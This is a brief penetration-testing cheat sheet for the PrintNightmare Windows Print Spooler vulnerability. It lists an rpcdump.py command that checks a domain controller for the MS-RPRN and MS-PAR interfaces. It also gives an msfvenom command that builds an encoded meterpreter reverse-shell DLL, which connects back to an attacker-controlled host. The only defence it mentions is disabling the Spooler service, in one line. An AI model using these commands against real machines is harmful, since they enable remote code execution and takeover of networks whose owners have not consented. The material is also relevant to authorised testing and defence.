PrintNightmare
PrintNightmare
NEEDS NEWEST IMPACKET
Scan for it
$ rpcdump.py @[dc-ip] | egrep 'MS-RPRN|MS-PAR'Attack
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[attacker machine] LPORT=[listener port] -f dll -e x64/shikata_ga_nai -i 5 -o shell.dllDefense
Disable Spooler Service
Last updated